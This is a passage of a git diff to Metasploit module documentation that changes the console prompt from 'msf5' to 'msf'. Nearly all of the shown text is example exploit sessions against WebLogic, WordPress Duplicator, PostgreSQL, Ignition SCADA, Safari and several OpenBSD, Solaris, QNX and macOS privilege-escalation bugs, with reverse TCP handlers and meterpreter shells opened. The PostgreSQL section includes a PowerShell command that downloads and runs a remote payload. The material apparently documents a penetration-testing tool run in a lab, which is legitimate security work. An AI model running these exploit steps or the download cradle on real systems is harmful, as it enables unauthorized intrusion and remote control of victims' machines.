lhost => 172.16.215.1 - msf5 exploit(multi/misc/weblogic_deserialize_badattr_extcomp) > run + msf exploit(multi/misc/weblogic_deserialize_badattr_extcomp) > run [*] Started reverse TCP handler on 172.16.215.1:4444 [*] 172.16.215.181:7001 - Executing automatic check (disable AutoCheck to override) @@ -81,11 +81,11 @@ ### WebLogic `v12.2.1.4.0` on Ubuntu 18.04 ``` - msf5 exploit(multi/misc/weblogic_deserialize_badattr_extcomp) > set target 1 + msf exploit(multi/misc/weblogic_deserialize_badattr_extcomp) > set target 1 target => 1 - msf5 exploit(multi/misc/weblogic_deserialize_badattr_extcomp) > set rhosts 172.16.215.180 + msf exploit(multi/misc/weblogic_deserialize_badattr_extcomp) > set rhosts 172.16.215.180 rhosts => 172.16.215.180 - msf5 exploit(multi/misc/weblogic_deserialize_badattr_extcomp) > run + msf exploit(multi/misc/weblogic_deserialize_badattr_extcomp) > run [*] Started reverse TCP handler on 172.16.215.1:4444 [*] 172.16.215.180:7001 - Executing automatic check (disable AutoCheck to override) diff --git a/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md b/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md index b7635aaffa..26ead6c471 100644 --- a/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md +++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md @@ -44,12 +44,12 @@ ### WebLogic `v12.2.1.4` on Windows 10 ``` - msf5 > use exploit/multi/misc/weblogic_deserialize_badattrval - msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set rhosts 172.16.215.185 + msf > use exploit/multi/misc/weblogic_deserialize_badattrval + msf exploit(multi/misc/weblogic_deserialize_badattrval) > set rhosts 172.16.215.185 rhosts => 172.16.215.185 - msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set lhost 172.16.215.1 + msf exploit(multi/misc/weblogic_deserialize_badattrval) > set lhost 172.16.215.1 lhost => 172.16.215.1 - msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > run + msf exploit(multi/misc/weblogic_deserialize_badattrval) > run [*] Started reverse TCP handler on 172.16.215.1:4444 [*] 172.16.215.185:7001 - WebLogic version detected: 12.2.1.4.0 @@ -74,13 +74,13 @@ ### WebLogic `v12.1.3.0.0` on Ubuntu 18.04 Linux ``` - msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set target 1 + msf exploit(multi/misc/weblogic_deserialize_badattrval) > set target 1 target => 1 - msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set payload linux/x64/meterpreter/reverse_tcp + msf exploit(multi/misc/weblogic_deserialize_badattrval) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp - msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set rhosts 172.16.215.196 + msf exploit(multi/misc/weblogic_deserialize_badattrval) > set rhosts 172.16.215.196 rhosts => 172.16.215.196 - msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > run + msf exploit(multi/misc/weblogic_deserialize_badattrval) > run [*] Started reverse TCP handler on 172.16.215.1:4444 [*] 172.16.215.196:7001 - WebLogic version detected: 12.1.3.0.0 diff --git a/documentation/modules/exploit/multi/php/wp_duplicator_code_inject.md b/documentation/modules/exploit/multi/php/wp_duplicator_code_inject.md index b946c1759e..24f2c0dad0 100644 --- a/documentation/modules/exploit/multi/php/wp_duplicator_code_inject.md +++ b/documentation/modules/exploit/multi/php/wp_duplicator_code_inject.md @@ -44,14 +44,14 @@ The path to the installer.php file to exploit By default, the path is `/installe ### Debian 9 running WordPress 4.9.8 with Duplicator 1.2.40 ``` -msf5 > use exploit/multi/php/wp_duplicator_code_inject -msf5 exploit(multi/php/wp_duplicator_code_inject) > set rhosts 192.168.37.247 +msf > use exploit/multi/php/wp_duplicator_code_inject +msf exploit(multi/php/wp_duplicator_code_inject) > set rhosts 192.168.37.247 rhosts => 192.168.37.247 -msf5 exploit(multi/php/wp_duplicator_code_inject) > set targeturi /wordpress/installer.php +msf exploit(multi/php/wp_duplicator_code_inject) > set targeturi /wordpress/installer.php targeturi => /wordpress/installer.php -msf5 exploit(multi/php/wp_duplicator_code_inject) > set lhost 192.168.37.1 +msf exploit(multi/php/wp_duplicator_code_inject) > set lhost 192.168.37.1 lhost => 192.168.37.1 -msf5 exploit(multi/php/wp_duplicator_code_inject) > run +msf exploit(multi/php/wp_duplicator_code_inject) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Checking if the wp-config.php file already exists... diff --git a/documentation/modules/exploit/multi/postgres/postgres_copy_from_program_cmd_exec.md b/documentation/modules/exploit/multi/postgres/postgres_copy_from_program_cmd_exec.md index 806087fbde..bb3c361b1a 100644 --- a/documentation/modules/exploit/multi/postgres/postgres_copy_from_program_cmd_exec.md +++ b/documentation/modules/exploit/multi/postgres/postgres_copy_from_program_cmd_exec.md @@ -73,19 +73,19 @@ Use the techniques described in this blogpost to verify command execution: ### Exploiting PostgreSQL 11.2 on Linux Ubuntu 18.04 - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set DATABASE postgres + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set DATABASE postgres DATABASE => postgres - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set USERNAME postgres + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set USERNAME postgres USERNAME => postgres - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set PASSWORD postgres + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set PASSWORD postgres PASSWORD => postgres - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set payload cmd/unix/reverse_perl + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set payload cmd/unix/reverse_perl payload => cmd/unix/reverse_perl - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set LHOST 192.168.0.18 + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set LHOST 192.168.0.18 LHOST => 192.168.0.18 - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set RHOSTS 192.168.0.25 + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set RHOSTS 192.168.0.25 RHOSTS => 192.168.0.25 - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > show options + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > show options Module options (exploit/multi/postgres/postgres_copy_from_program_cmd_exec): @@ -114,7 +114,7 @@ Use the techniques described in this blogpost to verify command execution: -- ---- 0 Automatic - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > exploit + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > exploit [*] Started reverse TCP handler on 192.168.0.18:4456 [*] 192.168.0.25:5432 - 192.168.0.25:5432 - PostgreSQL 11.2 (Ubuntu 11.2-1.pgdg18.04+1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 7.3.0-27ubuntu1~18.04) 7.3.0, 64-bit @@ -135,13 +135,13 @@ Use the techniques described in this blogpost to verify command execution: ### Exploiting PostgreSQL 10.7 on Windows 10 - msf5 exploit(multi/script/web_delivery) > set target 2 + msf exploit(multi/script/web_delivery) > set target 2 target => 2 - msf5 exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp + msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp - msf5 exploit(multi/script/web_delivery) > set LHOST 192.168.0.18 + msf exploit(multi/script/web_delivery) > set LHOST 192.168.0.18 LHOST => 192.168.0.18 - msf5 exploit(multi/script/web_delivery) > show options + msf exploit(multi/script/web_delivery) > show options Module options (exploit/multi/script/web_delivery): @@ -170,7 +170,7 @@ Use the techniques described in this blogpost to verify command execution: 2 PSH - msf5 exploit(multi/script/web_delivery) > exploit -j + msf exploit(multi/script/web_delivery) > exploit -j [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. @@ -179,14 +179,14 @@ Use the techniques described in this blogpost to verify command execution: [*] Local IP: http://192.168.0.18:8080/pUDD5sy8vTTD [*] Server started. [*] Run the following command on the target machine: - msf5 exploit(multi/script/web_delivery) > powershell.exe -nop -w hidden -c $a=new-object net.webclient;$a.proxy=[Net.WebRequest]::GetSystemWebProxy();$a.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $a.downloadstring('http://192.168.0.18:8080/pUDD5sy8vTTD'); + msf exploit(multi/script/web_delivery) > powershell.exe -nop -w hidden -c $a=new-object net.webclient;$a.proxy=[Net.WebRequest]::GetSystemWebProxy();$a.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $a.downloadstring('http://192.168.0.18:8080/pUDD5sy8vTTD'); - msf5 exploit(multi/script/web_delivery) > use exploit/multi/postgres/postgres_copy_from_program_cmd_exec - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set DATABASE postgres + msf exploit(multi/script/web_delivery) > use exploit/multi/postgres/postgres_copy_from_program_cmd_exec + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set DATABASE postgres DATABASE => postgres - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set RHOSTS 192.168.0.24 + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set RHOSTS 192.168.0.24 RHOSTS => 192.168.0.24 - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > show options + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > show options Module options (exploit/multi/postgres/postgres_copy_from_program_cmd_exec): @@ -208,9 +208,9 @@ Use the techniques described in this blogpost to verify command execution: 0 Automatic - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set COMMAND powershell.exe -nop -w hidden -c $a=new-object net.webclient;$a.proxy=[Net.WebRequest]::GetSystemWebProxy();$a.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $a.downloadstring(\'http://192.168.0.18:8080/pUDD5sy8vTTD\'); + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set COMMAND powershell.exe -nop -w hidden -c $a=new-object net.webclient;$a.proxy=[Net.WebRequest]::GetSystemWebProxy();$a.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $a.downloadstring(\'http://192.168.0.18:8080/pUDD5sy8vTTD\'); COMMAND => powershell.exe -nop -w hidden -c $a=new-object net.webclient;$a.proxy=[Net.WebRequest]::GetSystemWebProxy();$a.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $a.downloadstring('http://192.168.0.18:8080/pUDD5sy8vTTD') - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > exploit + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > exploit [*] Started reverse TCP double handler on 192.168.0.18:4456 [*] 192.168.0.24:5432 - 192.168.0.24:5432 - PostgreSQL 10.7, compiled by Visual C++ build 1800, 32-bit @@ -221,11 +221,11 @@ Use the techniques described in this blogpost to verify command execution: [!] 192.168.0.24:5432 - 192.168.0.24:5432 - Unable to execute query: COPY msftesttable FROM PROGRAM 'powershell.exe -nop -w hidden -c $a=new-object net.webclient;$a.proxy=[Net.WebRequest]::GetSystemWebProxy();$a.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $a.downloadstring(''http://192.168.0.18:8080/pUDD5sy8vTTD'');'; [*] 192.168.0.24:5432 - Exploit Failed [*] Exploit completed, but no session was created. - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > [*] Sending stage (179779 bytes) to 192.168.0.24 [*] Meterpreter session 1 opened (192.168.0.18:4444 -> 192.168.0.24:50154) at 2019-03-24 17:40:59 +0000 - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > show sessions + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > show sessions Active sessions =============== @@ -234,7 +234,7 @@ Use the techniques described in this blogpost to verify command execution: -- ---- ---- ----------- ---------- 1 meterpreter x86/windows NT AUTHORITY\NETWORK SERVICE @ DESKTOP-BHTT8OP 192.168.0.18:4444 -> 192.168.0.24:50154 (192.168.0.24) - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > sessions -i 1 + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid diff --git a/documentation/modules/exploit/multi/scada/inductive_ignition_rce.md b/documentation/modules/exploit/multi/scada/inductive_ignition_rce.md index cb8bfc80d2..0bc2f339ee 100644 --- a/documentation/modules/exploit/multi/scada/inductive_ignition_rce.md +++ b/documentation/modules/exploit/multi/scada/inductive_ignition_rce.md @@ -45,15 +45,15 @@ Exploit targets: ## Scenarios ``` -msf5 exploit(multi/scada/inductive_ignition_rce) > set rhost 10.10.10.204 +msf exploit(multi/scada/inductive_ignition_rce) > set rhost 10.10.10.204 rhost => 10.10.10.204 -msf5 exploit(multi/scada/inductive_ignition_rce) > set lhost 10.10.10.1 +msf exploit(multi/scada/inductive_ignition_rce) > set lhost 10.10.10.1 lhost => 10.10.10.1 -msf5 exploit(multi/scada/inductive_ignition_rce) > check +msf exploit(multi/scada/inductive_ignition_rce) > check [*] 10.10.10.204:8088 - Detected version 8.0.7 [*] 10.10.10.204:8088 - The target appears to be vulnerable. -msf5 exploit(multi/scada/inductive_ignition_rce) > run +msf exploit(multi/scada/inductive_ignition_rce) > run [*] Started reverse TCP handler on 10.10.10.1:4444 [*] 10.10.10.204:8088 - Attacking Windows target diff --git a/documentation/modules/exploit/openbsd/local/dynamic_loader_chpass_privesc.md b/documentation/modules/exploit/openbsd/local/dynamic_loader_chpass_privesc.md index f8ebcc530c..c0a65e1389 100644 --- a/documentation/modules/exploit/openbsd/local/dynamic_loader_chpass_privesc.md +++ b/documentation/modules/exploit/openbsd/local/dynamic_loader_chpass_privesc.md @@ -46,19 +46,19 @@ ### OpenBSD 6.1 GENERIC#19 amd64 ``` - msf5 > use exploit/openbsd/local/dynamic_loader_chpass_privesc - msf5 exploit(openbsd/local/dynamic_loader_chpass_privesc) > set verbose true + msf > use exploit/openbsd/local/dynamic_loader_chpass_privesc + msf exploit(openbsd/local/dynamic_loader_chpass_privesc) > set verbose true verbose => true - msf5 exploit(openbsd/local/dynamic_loader_chpass_privesc) > set session 1 + msf exploit(openbsd/local/dynamic_loader_chpass_privesc) > set session 1 session => 1 - msf5 exploit(openbsd/local/dynamic_loader_chpass_privesc) > check + msf exploit(openbsd/local/dynamic_loader_chpass_privesc) > check [+] Patch 013_ldso is not present [+] cc is installed [*] The service is running, but could not be validated. - msf5 exploit(openbsd/local/dynamic_loader_chpass_privesc) > set lhost 172.16.191.165 + msf exploit(openbsd/local/dynamic_loader_chpass_privesc) > set lhost 172.16.191.165 lhost => 172.16.191.165 - msf5 exploit(openbsd/local/dynamic_loader_chpass_privesc) > run + msf exploit(openbsd/local/dynamic_loader_chpass_privesc) > run [*] Started reverse TCP double handler on 172.16.191.165:4444 [+] Patch 013_ldso is not present diff --git a/documentation/modules/exploit/osx/browser/safari_proxy_object_type_confusion.md b/documentation/modules/exploit/osx/browser/safari_proxy_object_type_confusion.md index 286f043d8f..45d92dea11 100644 --- a/documentation/modules/exploit/osx/browser/safari_proxy_object_type_confusion.md +++ b/documentation/modules/exploit/osx/browser/safari_proxy_object_type_confusion.md @@ -27,24 +27,24 @@ via the launchd's "spawn_via_launchd" API (CVE-2018-4404). ### High Sierra 10.13 ``` -msf5 > use exploit/osx/browser/safari_proxy_object_type_confusion -msf5 exploit(osx/browser/safari_proxy_object_type_confusion) > set LHOST 192.168.0.2 +msf > use exploit/osx/browser/safari_proxy_object_type_confusion +msf exploit(osx/browser/safari_proxy_object_type_confusion) > set LHOST 192.168.0.2 LHOST => 192.168.0.2 -msf5 exploit(osx/browser/safari_proxy_object_type_confusion) > exploit +msf exploit(osx/browser/safari_proxy_object_type_confusion) > exploit [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. -msf5 exploit(osx/browser/safari_proxy_object_type_confusion) > +msf exploit(osx/browser/safari_proxy_object_type_confusion) > [*] Started reverse TCP handler on 192.168.0.2:4444 [*] Using URL: http://0.0.0.0:8080/0PiuTy [*] Local IP: http://192.168.0.2:8080/0PiuTy [*] Server started. -msf5 exploit(osx/browser/safari_proxy_object_type_confusion) > +msf exploit(osx/browser/safari_proxy_object_type_confusion) > [*] 192.168.0.2 safari_proxy_object_type_confusion - Request from Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Safari/604.1.38 [*] Sending stage (53508 bytes) to 192.168.0.2 [*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.2:33200) at 2018-11-20 16:28:59 +0800 -msf5 exploit(osx/browser/safari_proxy_object_type_confusion) > sessions 1 +msf exploit(osx/browser/safari_proxy_object_type_confusion) > sessions 1 [*] Starting interaction with 1... meterpreter > sysinfo diff --git a/documentation/modules/exploit/osx/local/feedback_assistant_root.md b/documentation/modules/exploit/osx/local/feedback_assistant_root.md index 6a9ffe5b34..5caf9187bc 100644 --- a/documentation/modules/exploit/osx/local/feedback_assistant_root.md +++ b/documentation/modules/exploit/osx/local/feedback_assistant_root.md @@ -6,9 +6,9 @@ privilege escalation. ## Scenarios ``` -msf5 exploit(osx/local/feedback_assistant_root) > check +msf exploit(osx/local/feedback_assistant_root) > check [*] The target appears to be vulnerable. -msf5 exploit(osx/local/feedback_assistant_root) > run +msf exploit(osx/local/feedback_assistant_root) > run [*] Started reverse TCP handler on 172.16.135.1:5555 [*] Uploading file: '/tmp/.fjbgrf' diff --git a/documentation/modules/exploit/osx/local/libxpc_mitm_ssudo.md b/documentation/modules/exploit/osx/local/libxpc_mitm_ssudo.md index 65a69fac53..9270b528c4 100644 --- a/documentation/modules/exploit/osx/local/libxpc_mitm_ssudo.md +++ b/documentation/modules/exploit/osx/local/libxpc_mitm_ssudo.md @@ -24,14 +24,14 @@ replies from opendirectoryd to make it look like our password was valid. ## Scenarios ### Example Run ``` -msf5 exploit(multi/handler) > use exploit/osx/local/libxpc_mitm_ssudo -msf5 exploit(osx/local/libxpc_mitm_ssudo) > set LHOST 192.168.0.2 +msf exploit(multi/handler) > use exploit/osx/local/libxpc_mitm_ssudo +msf exploit(osx/local/libxpc_mitm_ssudo) > set LHOST 192.168.0.2 LHOST => 192.168.0.2 -msf5 exploit(osx/local/libxpc_mitm_ssudo) > set LPORT 4446 +msf exploit(osx/local/libxpc_mitm_ssudo) > set LPORT 4446 LPORT => 4446 -msf5 exploit(osx/local/libxpc_mitm_ssudo) > set SESSION 1 +msf exploit(osx/local/libxpc_mitm_ssudo) > set SESSION 1 SESSION => 1 -msf5 exploit(osx/local/libxpc_mitm_ssudo) > exploit +msf exploit(osx/local/libxpc_mitm_ssudo) > exploit [!] SESSION may not be compatible with this module. [*] Started reverse TCP handler on 192.168.0.2:4446 diff --git a/documentation/modules/exploit/osx/local/timemachine_cmd_injection.md b/documentation/modules/exploit/osx/local/timemachine_cmd_injection.md index f631f6d901..932d31fe36 100644 --- a/documentation/modules/exploit/osx/local/timemachine_cmd_injection.md +++ b/documentation/modules/exploit/osx/local/timemachine_cmd_injection.md @@ -19,8 +19,8 @@ The tmdiagnose binary uses awk to list every mounted volume, and composes shell ``` -msf5 exploit(multi/handler) > use exploit/osx/local/timemachine_cmd_injection -msf5 exploit(osx/local/timemachine_cmd_injection) > exploit +msf exploit(multi/handler) > use exploit/osx/local/timemachine_cmd_injection +msf exploit(osx/local/timemachine_cmd_injection) > exploit [!] SESSION may not be compatible with this module. [*] Started reverse TCP handler on 192.168.0.2:5555 diff --git a/documentation/modules/exploit/osx/local/vmware_fusion_lpe.md b/documentation/modules/exploit/osx/local/vmware_fusion_lpe.md index c2cd83603a..86e52daca4 100644 --- a/documentation/modules/exploit/osx/local/vmware_fusion_lpe.md +++ b/documentation/modules/exploit/osx/local/vmware_fusion_lpe.md @@ -40,7 +40,7 @@ Which session to use this exploit on. ### VMware Fusion 10.1.6 ``` -msf5 exploit(osx/local/vmware_fusion_lpe) > run +msf exploit(osx/local/vmware_fusion_lpe) > run [!] SESSION may not be compatible with this module. [!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress? @@ -203,7 +203,7 @@ resource (fusion.rb)> exploit [+] Deleted /Users/h00die/Contents/Library/services/TVOK7bDP [-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_fs_delete_dir: Operation failed: Python exception: OSError [*] Exploit completed, but no session was created. -msf5 exploit(osx/local/vmware_fusion_lpe) > sessions -i 2 +msf exploit(osx/local/vmware_fusion_lpe) > sessions -i 2 [*] Starting interaction with 2... meterpreter > getuid diff --git a/documentation/modules/exploit/qnx/local/ifwatchd_priv_esc.md b/documentation/modules/exploit/qnx/local/ifwatchd_priv_esc.md index 6fc9e281cd..826941c1d0 100644 --- a/documentation/modules/exploit/qnx/local/ifwatchd_priv_esc.md +++ b/documentation/modules/exploit/qnx/local/ifwatchd_priv_esc.md @@ -44,12 +44,12 @@ ## Scenarios ``` - msf5 > use exploit/qnx/local/ifwatchd_priv_esc - msf5 exploit(qnx/local/ifwatchd_priv_esc) > set session 1 + msf > use exploit/qnx/local/ifwatchd_priv_esc + msf exploit(qnx/local/ifwatchd_priv_esc) > set session 1 session => 1 - msf5 exploit(qnx/local/ifwatchd_priv_esc) > set lhost 172.16.191.188 + msf exploit(qnx/local/ifwatchd_priv_esc) > set lhost 172.16.191.188 lhost => 172.16.191.188 - msf5 exploit(qnx/local/ifwatchd_priv_esc) > run + msf exploit(qnx/local/ifwatchd_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [*] Writing interface arrival event script... diff --git a/documentation/modules/exploit/solaris/local/extremeparr_dtappgather_priv_esc.md b/documentation/modules/exploit/solaris/local/extremeparr_dtappgather_priv_esc.md index cd00c5e4ef..68707775e7 100644 --- a/documentation/modules/exploit/solaris/local/extremeparr_dtappgather_priv_esc.md +++ b/documentation/modules/exploit/solaris/local/extremeparr_dtappgather_priv_esc.md @@ -67,12 +67,12 @@ ### Solaris 10u1 (x86) ``` - msf5 > use exploit/solaris/local/extremeparr_dtappgather_priv_esc - msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > set session 1 + msf > use exploit/solaris/local/extremeparr_dtappgather_priv_esc + msf exploit(solaris/local/extremeparr_dtappgather_priv_esc) > set session 1 session => 1 - msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > set lhost 172.16.191.196 + msf exploit(solaris/local/extremeparr_dtappgather_priv_esc) > set lhost 172.16.191.196 lhost => 172.16.191.196 - msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > run + msf exploit(solaris/local/extremeparr_dtappgather_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.196:4444 [+] Created directory /usr/lib/locale/ExDmW diff --git a/documentation/modules/exploit/solaris/local/libnspr_nspr_log_file_priv_esc.md b/documentation/modules/exploit/solaris/local/libnspr_nspr_log_file_priv_esc.md index a96c9f1f7e..a54c674147 100644 --- a/documentation/modules/exploit/solaris/local/libnspr_nspr_log_file_priv_esc.md +++ b/documentation/modules/exploit/solaris/local/libnspr_nspr_log_file_priv_esc.md @@ -55,12 +55,12 @@ ## Scenarios ``` - msf5 > use exploit/solaris/local/libnspr_nspr_log_file_priv_esc - msf5 exploit(solaris/local/libnspr_nspr_log_file_priv_esc) > set session 1 + msf > use exploit/solaris/local/libnspr_nspr_log_file_priv_esc + msf exploit(solaris/local/libnspr_nspr_log_file_priv_esc) > set session 1 session => 1 - msf5 exploit(solaris/local/libnspr_nspr_log_file_priv_esc) > set lhost 172.16.191.196 + msf exploit(solaris/local/libnspr_nspr_log_file_priv_esc) > set lhost 172.16.191.196 lhost => 172.16.191.196 - msf5 exploit(solaris/local/libnspr_nspr_log_file_priv_esc) > run + msf exploit(solaris/local/libnspr_nspr_log_file_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.196:4444 [+] Created file /usr/lib/secure/libldap.so.5 diff --git a/documentation/modules/exploit/solaris/local/rsh_stack_clash_priv_esc.md b/documentation/modules/exploit/solaris/local/rsh_stack_clash_priv_esc.md index 3c06dcecbb..8c55a8b014 100644 --- a/documentation/modules/exploit/solaris/local/rsh_stack_clash_priv_esc.md +++ b/documentation/modules/exploit/solaris/local/rsh_stack_clash_priv_esc.md @@ -58,12 +58,12 @@ ### Solaris 11.3 (x86) ``` - msf5 > use exploit/solaris/local/rsh_stack_clash_priv_esc - msf5 exploit(solaris/local/rsh_stack_clash_priv_esc) > set session 1 + msf > use exploit/solaris/local/rsh_stack_clash_priv_esc + msf exploit(solaris/local/rsh_stack_clash_priv_esc) > set session 1 session => 1 - msf5 exploit(solaris/local/rsh_stack_clash_priv_esc) > set rhost 172.16.191.221 + msf exploit(solaris/local/rsh_stack_clash_priv_esc) > set rhost 172.16.191.221 rhost => 172.16.191.221 - msf5 exploit(solaris/local/rsh_stack_clash_priv_esc) > run + msf exploit(solaris/local/rsh_stack_clash_priv_esc) > run [!] SESSION may not be compatible with this module. [*] Using target: Solaris 11.3 diff --git a/documentation/modules/exploit/solaris/local/xscreensaver_log_priv_esc.md b/documentation/modules/exploit/solaris/local/xscreensaver_log_priv_esc.md index 7dfed50c72..3126d0fd5e 100644 --- a/documentation/modules/exploit/solaris/local/xscreensaver_log_priv_esc.md +++ b/documentation/modules/exploit/solaris/local/xscreensaver_log_priv_esc.md @@ -47,12 +47,12 @@ ### Solaris 11.3 (x86) ``` - msf5 > use exploit/solaris/local/xscreensaver_log_priv_esc - msf5 exploit(solaris/local/xscreensaver_log_priv_esc) > set session 1 + msf > use exploit/solaris/local/xscreensaver_log_priv_esc + msf exploit(solaris/local/xscreensaver_log_priv_esc) > set session 1 session => 1 - msf5 exploit(solaris/local/xscreensaver_log_priv_esc) > set lhost 172.16.191.165 + msf exploit(solaris/local/xscreensaver_log_priv_esc) > set lhost 172.16.191.165 lhost => 172.16.191.165 - msf5 exploit(solaris/local/xscreensaver_log_priv_esc) > run + msf exploit(solaris/local/xscreensaver_log_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [*] Starting Xorg on display :1 ... diff --git a/documentation/modules/exploit/unix/fileformat/metasploit_libnotify_cmd_injection.md b/documentation/modules/exploit/unix/fileformat/metasploit_libnotify_cmd_injection.md index 85c21ba84c..0adee0bbda 100644 --- a/documentation/modules/exploit/unix/fileformat/metasploit_libnotify_cmd_injection.md +++ b/documentation/modules/exploit/unix/fileformat/metasploit_libnotify_cmd_injection.md @@ -32,8 +32,8 @@ command. ``` -msf5 > use exploit/unix/fileformat/metasploit_libnotify_cmd_injection -msf5 exploit(unix/fileformat/metasploit_libnotify_cmd_injection) > show options +msf > use exploit/unix/fileformat/metasploit_libnotify_cmd_injection +msf exploit(unix/fileformat/metasploit_libnotify_cmd_injection) > show options Module options (exploit/unix/fileformat/metasploit_libnotify_cmd_injection): @@ -60,12 +60,12 @@ Exploit target: 0 Automatic -msf5 exploit(unix/fileformat/metasploit_libnotify_cmd_injection) > exploit +msf exploit(unix/fileformat/metasploit_libnotify_cmd_injection) > exploit [*] Writing xml file: scan.xml [+] scan.xml stored at /home/smcintyre/.msf4/local/scan.xml -msf5 exploit(unix/fileformat/metasploit_libnotify_cmd_injection) > use exploit/multi/handler -msf5 exploit(multi/handler) > show options +msf exploit(unix/fileformat/metasploit_libnotify_cmd_injection) > use exploit/multi/handler +msf exploit(multi/handler) > show options Module options (exploit/multi/handler): @@ -89,29 +89,29 @@ Exploit target: 0 Wildcard Target -msf5 exploit(multi/handler) > exploit +msf exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.159.128:4444 ^C[-] Exploit failed [user-interrupt]: Interrupt [-] exploit: Interrupted -msf5 exploit(multi/handler) > exploit -j +msf exploit(multi/handler) > exploit -j [*] Exploit running as background job 3. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 192.168.159.128:4444 -msf5 exploit(multi/handler) > version +msf exploit(multi/handler) > version Framework: 5.0.76-dev-50cfb07cff Console : 5.0.76-dev-50cfb07cff -msf5 exploit(multi/handler) > load libnotify +msf exploit(multi/handler) > load libnotify [*] Successfully loaded plugin: libnotify -msf5 exploit(multi/handler) > services -d +msf exploit(multi/handler) > services -d Services ======== host port proto name state info ---- ---- ----- ---- ----- ---- -msf5 exploit(multi/handler) > db_import /home/smcintyre/.msf4/local/scan.xml +msf exploit(multi/handler) > db_import /home/smcintyre/.msf4/local/scan.xml [*] Importing 'Nmap XML' data [*] Import: Parsing with 'Nokogiri v1.10.8' [*] Importing host 192.168.20.121 @@ -120,9 +120,9 @@ sh: line 2: Proto:: command not found sh: -c: line 3: unexpected EOF while looking for matching `'' sh: -c: line 4: syntax error: unexpected end of file [*] Successfully imported /home/smcintyre/.msf4/local/scan.xml -msf5 exploit(multi/handler) > [*] Command shell session 4 opened (192.168.159.128:4444 -> 192.168.159.128:35516) at 2020-04-16 14:54:39 -0400 +msf exploit(multi/handler) > [*] Command shell session 4 opened (192.168.159.128:4444 -> 192.168.159.128:35516) at 2020-04-16 14:54:39 -0400 -msf5 exploit(multi/handler) > sessions -i 4 +msf exploit(multi/handler) > sessions -i 4 [*] Starting interaction with 4... id diff --git a/documentation/modules/exploit/unix/http/laravel_token_unserialize_exec.md b/documentation/modules/exploit/unix/http/laravel_token_unserialize_exec.md index cd1ee22c2f..a28dea345f 100644 --- a/documentation/modules/exploit/unix/http/laravel_token_unserialize_exec.md +++ b/documentation/modules/exploit/unix/http/laravel_token_unserialize_exec.md @@ -27,13 +27,13 @@ The module may also uses CVE-2017-16894 to check for a leaked key. Another 